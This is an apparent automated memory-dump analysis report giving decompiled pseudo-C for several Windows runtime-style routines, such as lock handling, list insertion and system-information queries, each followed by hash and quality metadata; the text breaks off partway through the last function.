                                                					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                						E015E9080(_t73, __ecx, __ecx, _t92);
                                                					}
                                                				}
                                                				_t74 = 0;
                                                				_t96 =  *0x7ffe036a - 1;
                                                				_v12 = 0;
                                                				_v7 = 0;
                                                				if(_t96 > 0) {
                                                					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                					_v12 = _t74;
                                                					_v7 = _t96 != 0;
                                                				}
                                                				_t79 = 0;
                                                				_v8 = 0;
                                                				_v5 = 0;
                                                				while(1) {
                                                					L4:
                                                					_t59 = 1;
                                                					L5:
                                                					while(1) {
                                                						if(_t59 == 0) {
                                                							L12:
                                                							_t21 = _t90 + 4; // 0x775ec21e
                                                							_t87 =  *_t21;
                                                							_v6 = 0;
                                                							if(_t79 != 0) {
                                                								if((_t87 & 0x00000002) != 0) {
                                                									goto L19;
                                                								}
                                                								if((_t87 & 0x00000001) != 0) {
                                                									_v6 = 1;
                                                									_t74 = _t87 ^ 0x00000003;
                                                								} else {
                                                									_t51 = _t87 - 2; // -2
                                                									_t74 = _t51;
                                                								}
                                                								goto L15;
                                                							} else {
                                                								if((_t87 & 0x00000001) != 0) {
                                                									_v6 = 1;
                                                									_t74 = _t87 ^ 0x00000001;
                                                								} else {
                                                									_t26 = _t87 - 4; // -4
                                                									_t74 = _t26;
                                                									if((_t74 & 0x00000002) == 0) {
                                                										_t74 = _t74 - 2;
                                                									}
                                                								}
                                                								L15:
                                                								if(_t74 == _t87) {
                                                									L19:
                                                									E015E2D8A(_t74, _t90, _t87, _t90);
                                                									_t74 = _v12;
                                                									_v8 = 1;
                                                									if(_v7 != 0 && _t74 > 0x64) {
                                                										_t74 = _t74 - 1;
                                                										_v12 = _t74;
                                                									}
                                                									_t79 = _v5;
                                                									goto L4;
                                                								}
                                                								asm("lock cmpxchg [esi], ecx");
                                                								if(_t87 != _t87) {
                                                									_t74 = _v12;
                                                									_t59 = 0;
                                                									_t79 = _v5;
                                                									continue;
                                                								}
                                                								if(_v6 != 0) {
                                                									_t74 = _v12;
                                                									L25:
                                                									if(_v7 != 0) {
                                                										if(_t74 < 0x7d0) {
                                                											if(_v8 == 0) {
                                                												_t74 = _t74 + 1;
                                                											}
                                                										}
                                                										_t38 = _t90 + 0x14; // 0x0
                                                										_t39 = _t90 + 0x14; // 0x0
                                                										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                											_t85 = _t85 & 0xff000000;
                                                										}
                                                										 *(_t90 + 0x14) = _t85;
                                                									}
                                                									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                									return 0;
                                                								}
                                                								_v5 = 1;
                                                								_t87 = _t74;
                                                								goto L19;
                                                							}
                                                						}
                                                						_t94 = _t74;
                                                						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                						if(_t74 == 0) {
                                                							goto L12;
                                                						} else {
                                                							_t91 = _t90 + 4;
                                                							goto L8;
                                                							L9:
                                                							while((_t81 & 0x00000001) != 0) {
                                                								_t69 = _t81;
                                                								asm("lock cmpxchg [edi], edx");
                                                								if(_t69 != _t81) {
                                                									_t81 = _t69;
                                                									continue;
                                                								}
                                                								_t90 = _v16;
                                                								goto L25;
                                                							}
                                                							asm("pause");
                                                							_t94 = _t94 - 1;
                                                							if(_t94 != 0) {
                                                								L8:
                                                								_t81 =  *_t91;
                                                								goto L9;
                                                							} else {
                                                								_t90 = _v16;
                                                								_t79 = _v5;
                                                								goto L12;
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                • Instruction ID: f1eac5da63cfe254af0570c937cfc8f1b751d90f6eaaa5ec98b7139640f0b432
                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                • Instruction Fuzzy Hash: 6D51F032A04249ABEB25CB68C0C57AEBBF1FF05314F1881ADC6569B682C375A989C741
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E016B740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                				signed short* _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _t55;
                                                				void* _t56;
                                                				intOrPtr* _t66;
                                                				intOrPtr* _t69;
                                                				void* _t74;
                                                				intOrPtr* _t78;
                                                				intOrPtr* _t81;
                                                				intOrPtr* _t82;
                                                				intOrPtr _t83;
                                                				signed short* _t84;
                                                				intOrPtr _t85;
                                                				signed int _t87;
                                                				intOrPtr* _t90;
                                                				intOrPtr* _t93;
                                                				intOrPtr* _t94;
                                                				void* _t98;
                                                
                                                				_t84 = __edx;
                                                				_t80 = __ecx;
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t55 = __ecx;
                                                				_v8 = __edx;
                                                				_t87 =  *__edx & 0x0000ffff;
                                                				_v12 = __ecx;
                                                				_t3 = _t55 + 0x154; // 0x154
                                                				_t93 = _t3;
                                                				_t78 =  *_t93;
                                                				_t4 = _t87 + 2; // 0x2
                                                				_t56 = _t4;
                                                				while(_t78 != _t93) {
                                                					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                						L4:
                                                						_t78 =  *_t78;
                                                						continue;
                                                					} else {
                                                						_t7 = _t78 + 0x18; // 0x18
                                                						if(E0163D4F0(_t7, _t84[2], _t87) == _t87) {
                                                							_t40 = _t78 + 0xc; // 0xc
                                                							_t94 = _t40;
                                                							_t90 =  *_t94;
                                                							while(_t90 != _t94) {
                                                								_t41 = _t90 + 8; // 0x8
                                                								_t74 = E0162F380(_a4, _t41, 0x10);
                                                								_t98 = _t98 + 0xc;
                                                								if(_t74 != 0) {
                                                									_t90 =  *_t90;
                                                									continue;
                                                								}
                                                								goto L12;
                                                							}
                                                							_t82 = L01604620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                							if(_t82 != 0) {
                                                								_t46 = _t78 + 0xc; // 0xc
                                                								_t69 = _t46;
                                                								asm("movsd");
                                                								asm("movsd");
                                                								asm("movsd");
                                                								asm("movsd");
                                                								_t85 =  *_t69;
                                                								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                									L20:
                                                									_t82 = 3;
                                                									asm("int 0x29");
                                                								}
                                                								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                								 *_t82 = _t85;
                                                								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                								 *_t69 = _t82;
                                                								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                								goto L11;
                                                							} else {
                                                								L18:
                                                								_push(0xe);
                                                								_pop(0);
                                                							}
                                                						} else {
                                                							_t84 = _v8;
                                                							_t9 = _t87 + 2; // 0x2
                                                							_t56 = _t9;
                                                							goto L4;
                                                						}
                                                					}
                                                					L12:
                                                					return 0;
                                                				}
                                                				_t10 = _t87 + 0x1a; // 0x1a
                                                				_t78 = L01604620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                				if(_t78 == 0) {
                                                					goto L18;
                                                				} else {
                                                					_t12 = _t87 + 2; // 0x2
                                                					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                					_t16 = _t78 + 0x18; // 0x18
                                                					E0162F3E0(_t16, _v8[2], _t87);
                                                					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                					_t19 = _t78 + 0xc; // 0xc
                                                					_t66 = _t19;
                                                					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                					 *_t66 = _t66;
                                                					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                					_t81 = L01604620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                					if(_t81 == 0) {
                                                						goto L18;
                                                					} else {
                                                						_t26 = _t78 + 0xc; // 0xc
                                                						_t69 = _t26;
                                                						asm("movsd");
                                                						asm("movsd");
                                                						asm("movsd");
                                                						asm("movsd");
                                                						_t85 =  *_t69;
                                                						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                							goto L20;
                                                						} else {
                                                							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                							 *_t81 = _t85;
                                                							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                							 *_t69 = _t81;
                                                							_t83 = _v12;
                                                							 *(_t78 + 8) = 1;
                                                							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                							_t34 = _t83 + 0x154; // 0x1ba
                                                							_t69 = _t34;
                                                							_t85 =  *_t69;
                                                							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                								goto L20;
                                                							} else {
                                                								 *_t78 = _t85;
                                                								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                								 *_t69 = _t78;
                                                								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                							}
                                                						}
                                                						goto L11;
                                                					}
                                                				}
                                                				goto L12;
                                                			}






















                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 97%
                                                			E01612990() {
                                                				signed int* _t62;
                                                				signed int _t64;
                                                				intOrPtr _t66;
                                                				signed short* _t69;
                                                				intOrPtr _t76;
                                                				signed short* _t79;
                                                				void* _t81;
                                                				signed int _t82;
                                                				signed short* _t83;
                                                				signed int _t87;
                                                				intOrPtr _t91;
                                                				void* _t98;
                                                				signed int _t99;
                                                				void* _t101;
                                                				signed int* _t102;
                                                				void* _t103;
                                                				void* _t104;
                                                				void* _t107;
                                                
                                                				_push(0x20);
                                                				_push(0x16bff00);
                                                				E0163D08C(_t81, _t98, _t101);
                                                				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                				_t99 = 0;
                                                				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                				if(_t82 == 0) {
                                                					_t62 = 0xc0000100;
                                                				} else {
                                                					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                					_t102 = 0xc0000100;
                                                					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                					_t64 = 4;
                                                					while(1) {
                                                						 *(_t103 - 0x24) = _t64;
                                                						if(_t64 == 0) {
                                                							break;
                                                						}
                                                						_t87 = _t64 * 0xc;
                                                						 *(_t103 - 0x2c) = _t87;
                                                						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x15c1664));
                                                						if(_t107 <= 0) {
                                                							if(_t107 == 0) {
                                                								_t79 = E0162E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x15c1668)), _t82);
                                                								_t104 = _t104 + 0xc;
                                                								__eflags = _t79;
                                                								if(__eflags == 0) {
                                                									_t102 = E016651BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x15c166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                									break;
                                                								} else {
                                                									_t64 =  *(_t103 - 0x24);
                                                									goto L5;
                                                								}
                                                								goto L13;
                                                							} else {
                                                								L5:
                                                								_t64 = _t64 - 1;
                                                								continue;
                                                							}
                                                						}
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                					__eflags = _t102;
                                                					if(_t102 < 0) {
                                                						__eflags = _t102 - 0xc0000100;
                                                						if(_t102 == 0xc0000100) {
                                                							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                							__eflags = _t83;
                                                							if(_t83 != 0) {
                                                								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                								__eflags =  *_t83 - _t99;
                                                								if( *_t83 == _t99) {
                                                									_t102 = 0xc0000100;
                                                									goto L19;
                                                								} else {
                                                									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                											L26:
                                                											_t102 = E01612AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                											__eflags = _t102 - 0xc0000100;
                                                											if(_t102 != 0xc0000100) {
                                                												goto L12;
                                                											} else {
                                                												_t99 = 1;
                                                												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                												goto L18;
                                                											}
                                                										} else {
                                                											_t69 = E015F6600( *((intOrPtr*)(_t91 + 0x1c)));
                                                											__eflags = _t69;
                                                											if(_t69 != 0) {
                                                												goto L26;
                                                											} else {
                                                												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                												goto L18;
                                                											}
                                                										}
                                                									} else {
                                                										L18:
                                                										_t102 = E01612C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                										L19:
                                                										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                										goto L12;
                                                									}
                                                								}
                                                								L28:
                                                							} else {
                                                								E015FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                								_t76 = E01612AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                								__eflags = _t76 - 0xc0000100;
                                                								if(_t76 == 0xc0000100) {
                                                									 *((intOrPtr*)(_t103 - 0x1c)) = E01612C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                								}
                                                								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                								E01612ACB();
                                                							}
                                                						}
                                                					}
                                                					L12:
                                                					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                					_t62 = _t102;
                                                				}
                                                				L13:
                                                				return E0163D0D1(_t62);
                                                				goto L28;
                                                			}






















                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E01614D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                				signed int _v12;
                                                				char _v176;
                                                				char _v177;
                                                				char _v184;
                                                				intOrPtr _v192;
                                                				intOrPtr _v196;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed short _t42;
                                                				char* _t44;
                                                				intOrPtr _t46;
                                                				intOrPtr _t50;
                                                				char* _t57;
                                                				intOrPtr _t59;
                                                				intOrPtr _t67;
                                                				signed int _t69;
                                                
                                                				_t64 = __edx;
                                                				_v12 =  *0x16dd360 ^ _t69;
                                                				_t65 = 0xa0;
                                                				_v196 = __edx;
                                                				_v177 = 0;
                                                				_t67 = __ecx;
                                                				_v192 = __ecx;
                                                				E0162FA60( &_v176, 0, 0xa0);
                                                				_t57 =  &_v176;
                                                				_t59 = 0xa0;
                                                				if( *0x16d7bc8 != 0) {
                                                					L3:
                                                					while(1) {
                                                						asm("movsd");
                                                						asm("movsd");
                                                						asm("movsd");
                                                						asm("movsd");
                                                						_t67 = _v192;
                                                						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                						_push( &_v184);
                                                						_push(_t59);
                                                						_push(_t57);
                                                						_push(0xa0);
                                                						_push(_t57);
                                                						_push(0xf);
                                                						_t42 = E0162B0B0();
                                                						if(_t42 != 0xc0000023) {
                                                							break;
                                                						}
                                                						if(_v177 != 0) {
                                                							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                						}
                                                						_v177 = 1;
                                                						_t44 = L01604620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                						_t59 = _v184;
                                                						_t57 = _t44;
                                                						if(_t57 != 0) {
                                                							continue;
                                                						} else {
                                                							_t42 = 0xc0000017;
                                                							break;
                                                						}
                                                					}
                                                					if(_t42 != 0) {
                                                						_t65 = E015ECCC0(_t42);
                                                						if(_t65 != 0) {
                                                							L10:
                                                							if(_v177 != 0) {
                                                								if(_t57 != 0) {
                                                									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                								}
                                                							}
                                                							_t46 = _t65;
                                                							L12:
                                                							return E0162B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                						}
                                                						L7:
                                                						_t50 = _a4;
                                                						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                						if(_t50 != 3) {
                                                							if(_t50 == 2) {
                                                								goto L8;
                                                							}
                                                							L9:
                                                							if(E0162F380(_t67 + 0xc, 0x15c5138, 0x10) == 0) {
                                                								 *0x16d60d8 = _t67;
                                                							}
                                                							goto L10;
                                                						}
                                                						L8:
                                                						_t64 = _t57 + 0x28;
                                                						E01614F49(_t67, _t57 + 0x28);
                                                						goto L9;
                                                					}
                                                					_t65 = 0;
                                                					goto L7;
                                                				}
                                                				if(E01614E70(0x16d86b0, 0x1615690, 0, 0) != 0) {
                                                					_t46 = E015ECCC0(_t56);
                                                					goto L12;
                                                				} else {
                                                					_t59 = 0xa0;
                                                					goto L3;
                                                				}
                                                			}





















                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f0511bfbf82e335eea13a32316eff7dbb3a967cd3191fcaa750bd97cdae82cb
                                                • Instruction ID: cffe7f798bf21fc1e2c1f06f7c9eece1b807361eaec1bd7caec45815404a04d7
                                                • Opcode Fuzzy Hash: 5f0511bfbf82e335eea13a32316eff7dbb3a967cd3191fcaa750bd97cdae82cb
                                                • Instruction Fuzzy Hash: E941D371A443189FEB32DF18CC80F6AB7BAEB55710F0840A9E9459B385DB70ED44CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E01614BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                				signed int _v8;
                                                				short _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				char _v36;
                                                				char _v156;
                                                				short _v158;
                                                				intOrPtr _v160;
                                                				char _v164;
                                                				intOrPtr _v168;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t45;
                                                				intOrPtr _t74;
                                                				signed char _t77;
                                                				intOrPtr _t84;
                                                				char* _t85;
                                                				void* _t86;
                                                				intOrPtr _t87;
                                                				signed short _t88;
                                                				signed int _t89;
                                                
                                                				_t83 = __edx;
                                                				_v8 =  *0x16dd360 ^ _t89;
                                                				_t45 = _a8 & 0x0000ffff;
                                                				_v158 = __edx;
                                                				_v168 = __ecx;
                                                				if(_t45 == 0) {
                                                					L22:
                                                					_t86 = 6;
                                                					L12:
                                                					E015ECC50(_t86);
                                                					L11:
                                                					return E0162B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                				}
                                                				_t77 = _a4;
                                                				if((_t77 & 0x00000001) != 0) {
                                                					goto L22;
                                                				}
                                                				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                				if(_t45 !=  *_t8) {
                                                					goto L22;
                                                				}
                                                				_t9 = _t77 + 0x24; // 0x16d8504
                                                				E01602280(_t9, _t9);
                                                				_t87 = 0x78;
                                                				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                                				E0162FA60( &_v156, 0, _t87);
                                                				_t13 = _t77 + 0x30; // 0x3db8
                                                				_t85 =  &_v156;
                                                				_v36 =  *_t13;
                                                				_v28 = _v168;
                                                				_v32 = 0;
                                                				_v24 = 0;
                                                				_v20 = _v158;
                                                				_v160 = 0;
                                                				while(1) {
                                                					_push( &_v164);
                                                					_push(_t87);
                                                					_push(_t85);
                                                					_push(0x18);
                                                					_push( &_v36);
                                                					_push(0x1e);
                                                					_t88 = E0162B0B0();
                                                					if(_t88 != 0xc0000023) {
                                                						break;
                                                					}
                                                					if(_t85 !=  &_v156) {
                                                						L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                                					}
                                                					_t84 = L01604620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                                					_v168 = _v164;
                                                					if(_t84 == 0) {
                                                						_t88 = 0xc0000017;
                                                						goto L19;
                                                					} else {
                                                						_t74 = _v160 + 1;
                                                						_v160 = _t74;
                                                						if(_t74 >= 0x10) {
                                                							L19:
                                                							_t86 = E015ECCC0(_t88);
                                                							if(_t86 != 0) {
                                                								L8:
                                                								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                                								_t30 = _t77 + 0x24; // 0x16d8504
                                                								E015FFFB0(_t77, _t84, _t30);
                                                								if(_t84 != 0 && _t84 !=  &_v156) {
                                                									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                                								}
                                                								if(_t86 != 0) {
                                                									goto L12;
                                                								} else {
                                                									goto L11;
                                                								}
                                                							}
                                                							L6:
                                                							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                                							if(_v164 != 0) {
                                                								_t83 = _t84;
                                                								E01614F49(_t77, _t84);
                                                							}
                                                							goto L8;
                                                						}
                                                						_t87 = _v168;
                                                						continue;
                                                					}
                                                				}
                                                				if(_t88 != 0) {
                                                					goto L19;
                                                				}
                                                				goto L6;
                                                			}



























                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3388e183600b83c7a19c5528532024addb833b2ee9ad2b7c650308e2049e5d5e
                                                • Instruction ID: fe71a109ea0a5a30b1c4fb1c28687d934cebd98c8e76fb8141d4174a9d452f80
                                                • Opcode Fuzzy Hash: 3388e183600b83c7a19c5528532024addb833b2ee9ad2b7c650308e2049e5d5e
                                                • Instruction Fuzzy Hash: A841BE32A402299BDB21DF68CD40BEAB7B4EF45740F4500A9E908AB341EB74DE85CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E015F8A0A(intOrPtr* __ecx, signed int __edx) {
                                                				signed int _v8;
                                                				char _v524;
                                                				signed int _v528;
                                                				void* _v532;
                                                				char _v536;
                                                				char _v540;
                                                				char _v544;
                                                				intOrPtr* _v548;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t44;
                                                				void* _t46;
                                                				void* _t48;
                                                				signed int _t53;
                                                				signed int _t55;
                                                				intOrPtr* _t62;
                                                				void* _t63;
                                                				unsigned int _t75;
                                                				signed int _t79;
                                                				unsigned int _t81;
                                                				unsigned int _t83;
                                                				signed int _t84;
                                                				void* _t87;
                                                
                                                				_t76 = __edx;
                                                				_v8 =  *0x16dd360 ^ _t84;
                                                				_v536 = 0x200;
                                                				_t79 = 0;
                                                				_v548 = __edx;
                                                				_v544 = 0;
                                                				_t62 = __ecx;
                                                				_v540 = 0;
                                                				_v532 =  &_v524;
                                                				if(__edx == 0 || __ecx == 0) {
                                                					L6:
                                                					return E0162B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                                				} else {
                                                					_v528 = 0;
                                                					E015FE9C0(1, __ecx, 0, 0,  &_v528);
                                                					_t44 = _v528;
                                                					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                                					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                                					_t46 = 0xa;
                                                					_t87 = _t81 - _t46;
                                                					if(_t87 > 0 || _t87 == 0) {
                                                						 *_v548 = 0x15c1180;
                                                						L5:
                                                						_t79 = 1;
                                                						goto L6;
                                                					} else {
                                                						_t48 = E01611DB5(_t62,  &_v532,  &_v536);
                                                						_t76 = _v528;
                                                						if(_t48 == 0) {
                                                							L9:
                                                							E01623C2A(_t81, _t76,  &_v544);
                                                							 *_v548 = _v544;
                                                							goto L5;
                                                						}
                                                						_t62 = _v532;
                                                						if(_t62 != 0) {
                                                							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                                							_t53 =  *_t62;
                                                							_v528 = _t53;
                                                							if(_t53 != 0) {
                                                								_t63 = _t62 + 4;
                                                								_t55 = _v528;
                                                								do {
                                                									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                                										if(E015F8999(_t63,  &_v540) == 0) {
                                                											_t55 = _v528;
                                                										} else {
                                                											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                                											_t55 = _v528;
                                                											if(_t75 >= _t83) {
                                                												_t83 = _t75;
                                                											}
                                                										}
                                                									}
                                                									_t63 = _t63 + 0x14;
                                                									_t55 = _t55 - 1;
                                                									_v528 = _t55;
                                                								} while (_t55 != 0);
                                                								_t62 = _v532;
                                                							}
                                                							if(_t62 !=  &_v524) {
                                                								L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                                							}
                                                							_t76 = _t83 & 0x0000ffff;
                                                							_t81 = _t83 >> 0x10;
                                                						}
                                                						goto L9;
                                                					}
                                                				}
                                                			}




























                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e27497d9fdcaa53bb982d794f96e59b6b0483eb0cdf17358440eb1763df6a73
                                                • Instruction ID: 4de5119b538a624ee7c0eb0f6548cb8d4c55676a2686a7e0725ab42cda03428f
                                                • Opcode Fuzzy Hash: 6e27497d9fdcaa53bb982d794f96e59b6b0483eb0cdf17358440eb1763df6a73
                                                • Instruction Fuzzy Hash: 014192B1A4022D9BDB24DF59CC88AAEB7F5FB94310F1045EDDA199B242E7709E84CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E016669A6(signed short* __ecx, void* __eflags) {
                                                				signed int _v8;
                                                				signed int _v16;
                                                				intOrPtr _v20;
                                                				signed int _v24;
                                                				signed short _v28;
                                                				signed int _v32;
                                                				intOrPtr _v36;
                                                				signed int _v40;
                                                				char* _v44;
                                                				signed int _v48;
                                                				intOrPtr _v52;
                                                				signed int _v56;
                                                				char _v60;
                                                				signed int _v64;
                                                				char _v68;
                                                				char _v72;
                                                				signed short* _v76;
                                                				signed int _v80;
                                                				char _v84;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* _t68;
                                                				intOrPtr _t73;
                                                				signed short* _t74;
                                                				void* _t77;
                                                				void* _t78;
                                                				signed int _t79;
                                                				signed int _t80;
                                                
                                                				_v8 =  *0x16dd360 ^ _t80;
                                                				_t75 = 0x100;
                                                				_v64 = _v64 & 0x00000000;
                                                				_v76 = __ecx;
                                                				_t79 = 0;
                                                				_t68 = 0;
                                                				_v72 = 1;
                                                				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                                				_t77 = 0;
                                                				if(L015F6C59(__ecx[2], 0x100, __eflags) != 0) {
                                                					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                					if(_t79 != 0 && E01666BA3() != 0) {
                                                						_push(0);
                                                						_push(0);
                                                						_push(0);
                                                						_push(0x1f0003);
                                                						_push( &_v64);
                                                						if(E01629980() >= 0) {
                                                							E01602280(_t56, 0x16d8778);
                                                							_t77 = 1;
                                                							_t68 = 1;
